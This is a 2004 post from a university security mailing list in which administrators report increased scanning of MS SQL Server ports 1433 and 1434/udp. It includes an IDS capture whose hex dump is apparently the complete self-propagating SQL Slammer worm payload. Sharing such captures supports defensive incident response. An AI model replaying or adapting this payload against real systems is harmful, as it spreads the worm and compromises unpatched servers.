[unisog] 1433 scan increase

Nick Lewis lewisnic at internet2.edu
Fri Dec 31 21:41:56 GMT 2004


----- Original Message ----- 
From: "Jeff Kell" <jeff-kell at utc.edu>
To: "UNIversity Security Operations Group" <unisog at lists.sans.org>
Sent: Friday, December 31, 2004 2:51 PM
Subject: Re: [unisog] 1433 scan increase


> John K Lerchey wrote:
>> Yes, we're seeing them at CMU. No reports of compromised machines 
>> yet though.
>
>> On Wed, 29 Dec 2004 zero at zero.byzero.net wrote:
>>> Anyone seeing an increase in port 1433 (MS SQLServer) scans over 
>>> the last 24 hours?  It seems to have slowed down over the last 18 
>>> hours or so but continues.  I'm seeing this from many IP addresses 
>>> mostly in Asia.
>
> Increase here in 1434/udp, haven't seen that in some time.  Recent 
> ones that are particularly unusual are from source port 0 to dest 
> port 1434. I'm seeing a slow scan right now from 222.149.235.237.

I'm seeing the same host going back to 12/29 on our network.

12/31-15:33:20.219746 222.149.235.237:0 -> 207.75.164.234:1434
UDP TTL:104 TOS:0x0 ID:60922 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E... at ........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....

Nick.

Nick Lewis
System Administrator
Internet2
lewisnic at internet2.edu
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3258 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/unisog/attachments/20041231/86b33877/smime-0002.bin


More information about the unisog mailing list